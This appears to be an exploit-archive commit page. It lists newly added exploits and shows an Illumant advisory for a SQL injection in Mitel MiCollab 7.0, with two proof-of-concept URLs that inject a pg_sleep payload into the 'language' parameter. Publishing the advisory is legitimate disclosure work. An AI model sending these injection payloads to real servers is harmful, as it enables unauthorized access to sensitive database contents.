dfc00ffd48
22 new exploits Windows NDProxy - Privilege Escalation XP SP3 x86 and 2003 SP2 x86 (MS14-002) Windows XP SP3 x86 and 2003 SP2 x86 - NDProxy Privilege Escalation (MS14-002) exim <= 4.84-3 - Local Root Exploit Exim <= 4.84-3 - Local Root Exploit CoolPlayer (Standalone) build 2.19 - .m3u Stack Overflow OS X / iOS Suid Binary Logic Error Kernel Code Execution Multiple CCTV-DVR Vendors - Remote Code Execution MiCollab 7.0 - SQL Injection Vulnerability Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans Avira - Heap Underflow Parsing PE Section Headers Comodo - PackMan Unpacker Insufficient Parameter Validation Comodo - LZMA Decoder Heap Overflow via Insufficient Parameter Checks Comodo - Integer Overlow Leading to Heap Overflow Parsing Composite Documents Wireshark - dissect_ber_integer Static Out-of-Bounds Write Comodo - Integer Overflow Leading to Heap Overflow in Win32 Emulation Comodo Antivirus - Heap Overflow in LZX Decompression OS X Kernel - Code Execution Due to Lack of Bounds Checking in AppleUSBPipe::Abort Adobe Flash - Shape Rendering Crash Adobe Flash - Zlib Codec Heap Overflow Adobe Flash - Sprite Creation Use-After-Free Adobe Flash - Uninitialized Stack Parameter Access in AsBroadcaster.broadcastMessage UaF Fix Adobe Flash - Uninitialized Stack Parameter Access in Object.unwatch UaF Fix Adobe Flash - Uninitialized Stack Parameter Access in MovieClip.swapDepths UaF Fix OS X Kernel - AppleKeyStore Use-After-Free OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver
49 lines
2.1 KiB
Text
Executable file
49 lines
2.1 KiB
Text
Executable file
================
|
|
Exploit Title: SQL Injection Vulnerability in MiCollab v7.0
|
|
Date: 3-22-2016
|
|
Vendor Homepage: http://www.mitel.com
|
|
Vendor: Mitel
|
|
Software: MiCollab End User Portal
|
|
Version: v7.0
|
|
Advisory: http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
|
|
CVSS: 7.5
|
|
|
|
|
|
Product Summary
|
|
================
|
|
Mitel MiCollab delivers unified messaging, mobility, teleworking, and audio, web and video conferencing services tailored to the needs of today's mobile workforce. (http://www.mitel.com/products/collaboration-software/mitel-micollab)
|
|
|
|
|
|
Vulnerabilities
|
|
================
|
|
A SQL injection vulnerability has been identified in MiCollab 7.0 which, if successfully exploited, could allow an attacker to access sensitive information in the MiCollab database. (http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001)
|
|
|
|
The vulnerability is due to the unsanitized 'language' parameter in the 'mywindow' and 'PortletSelector' scripts.
|
|
|
|
|
|
Proof of concept
|
|
================
|
|
http://server/portal/portal/portal/portal/mywindow?portlets=&page=org.apache.jetspeed.om.page.impl.ContentPageImpl%40d57dde06&language=en_US';SELECT%20pg_sleep(5);--
|
|
http://server/portal/portal/portal/PortletSelector?portlets=&page=org.apache.jetspeed.om.page.impl.ContentPageImpl%40d57dde06&language=en_US';SELECT%20pg_sleep(5);--
|
|
|
|
|
|
Timeline
|
|
================
|
|
2016-02-01: Vendor advisory published
|
|
2016-03-22: PoC details published
|
|
|
|
|
|
Discovered by
|
|
================
|
|
Goran Tuzovic -- Goran [at] illumant.com
|
|
|
|
|
|
References
|
|
================
|
|
1. http://www.mitel.com/products/collaboration-software/mitel-micollab
|
|
2. http://www.mitel.com/security-advisories/mitel-product-security-advisory-16-0001
|
|
|
|
|
|
About Illumant
|
|
================
|
|
Illumant has conducted thousands of security assessment and compliance engagements, helping over 800 clients protect themselves from cyber-attacks. Through meticulous manual analysis, Illumant helps companies navigate the security and threat landscape to become more secure, less of a target, and more compliant. For more information, visit https://illumant.com/
|